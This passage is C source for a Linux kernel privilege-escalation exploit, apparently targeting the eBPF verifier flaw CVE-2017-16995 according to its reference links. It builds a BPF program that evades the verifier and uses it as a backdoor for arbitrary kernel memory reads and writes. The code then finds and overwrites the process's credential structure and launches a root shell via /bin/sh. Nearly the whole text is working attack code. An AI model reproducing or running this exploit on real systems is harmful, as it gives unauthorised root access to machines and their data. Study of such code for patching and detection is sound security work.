 * flags is passed through unchanged. Returns the syscall() result
 * (0 on success, -1 with errno set on failure).
 */
int bpf_update_elem(int fd, void *key, void *value, unsigned long long flags)
{
	union bpf_attr attr;

	/* Zero every byte so fields the command does not use are really 0. */
	memset(&attr, 0, sizeof(attr));
	attr.map_fd = fd;
	attr.key = ptr_to_u64(key);
	attr.value = ptr_to_u64(value);
	attr.flags = flags;

	return syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr));
}
/*
 * Read the element stored under *key in map fd into *value with
 * bpf(BPF_MAP_LOOKUP_ELEM). Returns the syscall() result
 * (0 on success, -1 with errno set on failure).
 */
int bpf_lookup_elem(int fd, void *key, void *value)
{
	union bpf_attr attr;

	/* Zero every byte so fields the command does not use are really 0. */
	memset(&attr, 0, sizeof(attr));
	attr.map_fd = fd;
	attr.key = ptr_to_u64(key);
	attr.value = ptr_to_u64(value);

	return syscall(__NR_bpf, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr));
}
/*
 * Instruction-builder macros. Each expands to a struct bpf_insn compound
 * literal, so they can be used directly as array initializers.
 */

/* 64-bit ALU operation OP on DST with immediate operand IMM. */
#define BPF_ALU64_IMM(OP, DST, IMM) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })
/* 64-bit register move: DST = SRC. */
#define BPF_MOV64_REG(DST, SRC) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_MOV | BPF_X, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = 0 })
/* 32-bit register move (BPF_ALU class): DST = SRC. */
#define BPF_MOV32_REG(DST, SRC) \
((struct bpf_insn) { \
.code = BPF_ALU | BPF_MOV | BPF_X, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = 0 })
/* 64-bit move of immediate IMM into DST (BPF_ALU64 class). */
#define BPF_MOV64_IMM(DST, IMM) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_MOV | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })
/* 32-bit move of immediate IMM into DST (BPF_ALU class). */
#define BPF_MOV32_IMM(DST, IMM) \
((struct bpf_insn) { \
.code = BPF_ALU | BPF_MOV | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })
/* Load a 64-bit immediate into DST; expands to TWO struct bpf_insn entries. */
#define BPF_LD_IMM64(DST, IMM) \
BPF_LD_IMM64_RAW(DST, 0, IMM)
/*
 * Two-instruction 64-bit immediate load: the first entry carries the low
 * 32 bits of IMM, the second (all other fields zero) carries the high 32 bits.
 */
#define BPF_LD_IMM64_RAW(DST, SRC, IMM) \
((struct bpf_insn) { \
.code = BPF_LD | BPF_DW | BPF_IMM, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = (__u32) (IMM) }), \
((struct bpf_insn) { \
.code = 0, \
.dst_reg = 0, \
.src_reg = 0, \
.off = 0, \
.imm = ((__u64) (IMM)) >> 32 })
/* Fallback definition in case the installed headers do not provide it. */
#ifndef BPF_PSEUDO_MAP_FD
# define BPF_PSEUDO_MAP_FD 1
#endif
/* 64-bit immediate load of MAP_FD with src_reg set to BPF_PSEUDO_MAP_FD. */
#define BPF_LD_MAP_FD(DST, MAP_FD) \
BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)
/* Memory load: DST = *(SIZE *)(SRC + OFF). */
#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \
((struct bpf_insn) { \
.code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = 0 })
/* Memory store from register: *(SIZE *)(DST + OFF) = SRC. */
#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \
((struct bpf_insn) { \
.code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = 0 })
/* Memory store of immediate: *(SIZE *)(DST + OFF) = IMM. */
#define BPF_ST_MEM(SIZE, DST, OFF, IMM) \
((struct bpf_insn) { \
.code = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, \
.dst_reg = DST, \
.src_reg = 0, \
.off = OFF, \
.imm = IMM })
/* Conditional jump comparing DST with immediate IMM using OP; OFF is the jump offset. */
#define BPF_JMP_IMM(OP, DST, IMM, OFF) \
((struct bpf_insn) { \
.code = BPF_JMP | BPF_OP(OP) | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = OFF, \
.imm = IMM })
/* Build an instruction from explicitly given field values. */
#define BPF_RAW_INSN(CODE, DST, SRC, OFF, IMM) \
((struct bpf_insn) { \
.code = CODE, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = IMM })
/* Program exit instruction; all operand fields are zero. */
#define BPF_EXIT_INSN() \
((struct bpf_insn) { \
.code = BPF_JMP | BPF_EXIT, \
.dst_reg = 0, \
.src_reg = 0, \
.off = 0, \
.imm = 0 })
/*
 * Four-instruction prologue: a 32-bit move of 0xFFFFFFFF into r2, a JNE
 * against the same immediate that skips two instructions when taken, and
 * a "r0 = 0; exit" pair on the fall-through path.
 *
 * The last line deliberately has no trailing backslash: a continuation
 * there would splice the following #define into this macro's body and
 * break compilation.
 */
#define BPF_DISABLE_VERIFIER() \
	BPF_MOV32_IMM(BPF_REG_2, 0xFFFFFFFF), /* r2 = (u32)0xFFFFFFFF */ \
	BPF_JMP_IMM(BPF_JNE, BPF_REG_2, 0xFFFFFFFF, 2), /* if (r2 == -1) { */ \
	BPF_MOV64_IMM(BPF_REG_0, 0), /* exit(0); */ \
	BPF_EXIT_INSN() /* } */
/*
 * Eight-instruction sequence: store idx at fp-4, point r2 at it, call
 * BPF_FUNC_map_lookup_elem with r1 = r9, exit if r0 is 0, otherwise load
 * the 64-bit value r0 points to into dst. Expects r9 to already hold the map.
 */
#define BPF_MAP_GET(idx, dst) \
BPF_MOV64_REG(BPF_REG_1, BPF_REG_9), /* r1 = r9 */ \
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), /* r2 = fp */ \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4), /* r2 = fp - 4 */ \
BPF_ST_MEM(BPF_W, BPF_REG_10, -4, idx), /* *(u32 *)(fp - 4) = idx */ \
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), /* if (r0 == 0) */ \
BPF_EXIT_INSN(), /* exit(0); */ \
BPF_LDX_MEM(BPF_DW, (dst), BPF_REG_0, 0) /* r_dst = *(u64 *)(r0) */
/*
 * Build the instruction array and submit it with bpf_prog_load() as a
 * BPF_PROG_TYPE_SOCKET_FILTER program under the "GPL" license string.
 * Returns whatever bpf_prog_load() returns.
 *
 * Program outline: save r1 at fp-16, load the global mapfd into r9, read
 * map slots 0..2 into r6 (op), r7 (address) and r8 (value), keep the
 * address of slot 2 in r2, then dispatch on r6 as the branch comments say.
 */
static int load_prog() {
struct bpf_insn prog[] = {
BPF_DISABLE_VERIFIER(),
BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_1, -16), /* *(fp - 16) = r1 */
BPF_LD_MAP_FD(BPF_REG_9, mapfd),
BPF_MAP_GET(0, BPF_REG_6), /* r6 = op */
BPF_MAP_GET(1, BPF_REG_7), /* r7 = address */
BPF_MAP_GET(2, BPF_REG_8), /* r8 = value */
/* store map slot address in r2 */
BPF_MOV64_REG(BPF_REG_2, BPF_REG_0), /* r2 = r0 */
BPF_MOV64_IMM(BPF_REG_0, 0), /* r0 = 0 for exit(0) */
BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 0, 2), /* if (op == 0) */
/* get fp */
BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_10, 0),
BPF_EXIT_INSN(),
BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 1, 3), /* else if (op == 1) */
/* get skbuff */
BPF_LDX_MEM(BPF_DW, BPF_REG_3, BPF_REG_10, -16),
BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_3, 0),
BPF_EXIT_INSN(),
BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 2, 3), /* else if (op == 2) */
/* read */
BPF_LDX_MEM(BPF_DW, BPF_REG_3, BPF_REG_7, 0),
BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_3, 0),
BPF_EXIT_INSN(),
/* else */
/* write */
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0),
BPF_EXIT_INSN(),
};
return bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, prog, sizeof(prog), "GPL", 0);
}
/* Print a printf-style message to stdout, prefixed with "[.] ". */
void info(const char *fmt, ...) {
	va_list ap;

	fputs("[.] ", stdout);
	va_start(ap, fmt);
	vprintf(fmt, ap);
	va_end(ap);
}
/* Print a printf-style message to stdout, prefixed with "[*] ". */
void msg(const char *fmt, ...) {
	va_list ap;

	fputs("[*] ", stdout);
	va_start(ap, fmt);
	vprintf(fmt, ap);
	va_end(ap);
}
/*
 * Print a printf-style message to stdout with a "[*] " prefix, unless the
 * global doredact is non-zero, in which case a fixed placeholder line is
 * printed and the arguments are ignored.
 */
void redact(const char *fmt, ...) {
	va_list args;

	/*
	 * Decide before va_start(): every va_start must be paired with a
	 * va_end in the same function, which the early return used to skip.
	 */
	if (doredact) {
		fprintf(stdout, "[!] ( ( R E D A C T E D ) )\n");
		return;
	}

	va_start(args, fmt);
	fprintf(stdout, "[*] ");
	vfprintf(stdout, fmt, args);
	va_end(args);
}
/*
 * Print a printf-style message to stdout, prefixed with "[!] ", then
 * terminate the process with exit status 1. Does not return.
 */
void fail(const char *fmt, ...) {
	va_list ap;

	fputs("[!] ", stdout);
	va_start(ap, fmt);
	vprintf(fmt, ap);
	va_end(ap);

	exit(1);
}
/*
 * One-time setup: print the banner, create the 3-slot array map, load the
 * BPF program, create an AF_UNIX datagram socket pair and attach the
 * program to sockets[1]. Any failure is reported through fail(), which
 * exits the process.
 */
void
initialize() {
	info("\n");
	info("t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)\n");
	info("\n");
	info(" ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **\n");
	info("\n");

	redact("creating bpf map\n");
	mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 3, 0);
	if (mapfd < 0) {
		fail("failed to create bpf map: '%s'\n", strerror(errno));
	}

	redact("sneaking evil bpf past the verifier\n");
	progfd = load_prog();
	if (progfd < 0) {
		/*
		 * Capture errno right away: printing the verifier log below
		 * goes through stdio, which may overwrite it before the
		 * failure reason is formatted.
		 */
		int load_errno = errno;

		if (load_errno == EACCES) {
			msg("log:\n%s", bpf_log_buf);
		}
		fail("failed to load prog '%s'\n", strerror(load_errno));
	}

	redact("creating socketpair()\n");
	if(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets)) {
		fail("failed to create socket pair '%s'\n", strerror(errno));
	}

	redact("attaching bpf backdoor to socket\n");
	if(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0) {
		fail("setsockopt '%s'\n", strerror(errno));
	}
}
/*
 * Write the whole global buffer to sockets[0]. Errors and short writes are
 * reported on stderr; the function returns normally in every case.
 */
static void writemsg() {
	ssize_t n = write(sockets[0], buffer, sizeof(buffer));
	if (n < 0) {
		perror("write");
		return;
	}
	if (n != sizeof(buffer)) {
		/* n is ssize_t, so it needs %zd; %d is a format/argument mismatch. */
		fprintf(stderr, "short write: %zd\n", n);
	}
}
/* Store value in slot key of the global map; exits through fail() on error. */
static void
update_elem(int key, unsigned long value) {
	int rc = bpf_update_elem(mapfd, &key, &value, 0);

	if (rc == 0) {
		return;
	}
	fail("bpf_update_elem failed '%s'\n", strerror(errno));
}
/* Read slot key of the global map and return it; exits through fail() on error. */
static unsigned long
get_value(int key) {
	unsigned long slot;
	int rc = bpf_lookup_elem(mapfd, &key, &slot);

	if (rc != 0) {
		fail("bpf_lookup_elem failed '%s'\n", strerror(errno));
	}
	return slot;
}
/*
 * Place op, addr and value in map slots 0, 1 and 2, send one message
 * through the socket pair, then return the current content of slot 2.
 */
static unsigned long
sendcmd(unsigned long op, unsigned long addr, unsigned long value) {
	const unsigned long slots[3] = { op, addr, value };

	for (int slot = 0; slot < 3; slot++) {
		update_elem(slot, slots[slot]);
	}
	writemsg();

	return get_value(2);
}
/* Issue command 1 (labelled "get skbuff" in load_prog) and return its result. */
unsigned long
get_skbuff() {
	unsigned long result = sendcmd(1, 0, 0);

	return result;
}
/* Issue command 0 (labelled "get fp" in load_prog) and return its result. */
unsigned long
get_fp() {
	unsigned long result = sendcmd(0, 0, 0);

	return result;
}
/* Issue command 2 (labelled "read" in load_prog) for addr and return the result. */
unsigned long
read64(unsigned long addr) {
	unsigned long result = sendcmd(2, addr, 0);

	return result;
}
/* Issue command 3 (the "write" branch in load_prog) with addr and val; the result is discarded. */
void
write64(unsigned long addr, unsigned long val) {
	unsigned long ignored = sendcmd(3, addr, val);

	(void)ignored;
}
/*
 * Scan up to 100 consecutive 8-byte words, starting at the pointer read
 * from skbuff + 24, for the value 0x7FFFFFFFFFFFFFFF and return the address
 * where it is found. Exits through fail() when no word matches.
 */
static unsigned long find_sk_rcvtimeo() {
	unsigned long skbuff = get_skbuff();
	/*
	 * struct sk_buff {
	 *     [...24 byte offset...]
	 *     struct sock *sk;
	 * };
	 *
	 */
	unsigned long addr = read64(skbuff + 24);
	/* addr is unsigned long, so it needs %lx rather than %llx. */
	msg("Leaking sock struct from %lx\n", addr);
	/*
	 * scan forward for expected sk_rcvtimeo value.
	 *
	 * struct sock {
	 *     [...]
	 *     long sk_rcvtimeo;
	 * };
	 */
	for (int i = 0; i < 100; i++, addr += 8) {
		if(read64(addr) == 0x7FFFFFFFFFFFFFFF) {
			msg("found sock->sk_rcvtimeo at offset %d\n", i * 8);
			return addr;
		}
	}
	fail("failed to find sk_rcvtimeo.\n");
	/* Not reached (fail() exits); keeps every path of this non-void function returning a value. */
	return 0;
}
/*
 * Return the 8-byte word stored immediately before the address reported by
 * find_sk_rcvtimeo().
 */
static unsigned long find_cred() {
	/*
	 * struct sock {
	 *     [...]
	 *     const struct cred *sk_peer_cred;
	 *     long sk_rcvtimeo;
	 * };
	 */
	/* Keep the value unsigned end to end; it was needlessly routed through a signed long. */
	unsigned long result = read64(find_sk_rcvtimeo() - 8);
	msg("found sock->sk_peer_cred\n");
	return result;
}
/*
 * Write eight consecutive 8-byte words starting at addr: the first word
 * with its upper 32 bits cleared, four zero words, then three all-ones
 * words. Which structure fields these words cover depends on the target's
 * struct cred layout — NOTE(review): confirm against the kernel in use.
 */
static void
hammer_cred(unsigned long addr) {
	/* addr is unsigned long, so it needs %lx rather than %llx. */
	msg("hammering cred structure at %lx\n", addr);
#define w64(w) do { write64(addr, (w)); addr += 8; } while (0)
	unsigned long val = read64(addr) & 0xFFFFFFFFUL;
	w64(val);
	w64(0); w64(0); w64(0); w64(0);
	w64(0xFFFFFFFFFFFFFFFF);
	w64(0xFFFFFFFFFFFFFFFF);
	w64(0xFFFFFFFFFFFFFFFF);
#undef w64
}
/*
 * Entry point: run initialize(), apply hammer_cred() to the address
 * returned by find_cred(), then replace the process with /bin/sh.
 * Command-line arguments are not used.
 */
int
main(int argc, char **argv) {
	(void)argc;
	(void)argv;

	initialize();
	hammer_cred(find_cred());
	msg("credentials patched, launching shell...\n");

	/*
	 * exec discards anything still sitting in stdio buffers, so flush
	 * first; otherwise the progress output is lost when stdout is a pipe
	 * or a file.
	 */
	fflush(stdout);

	/* A variadic argument list must end with a null pointer of type char *. */
	execl("/bin/sh", "/bin/sh", (char *)NULL);

	/* execl() returns only on failure. */
	fail("exec %s\n", strerror(errno));
	return 1;
}
参考链接
[1]https://dangokyo.me/2018/05/24/analysis-on-cve-2017-16995/
[2]https://security.tencent.com/index.php/blog/msg/124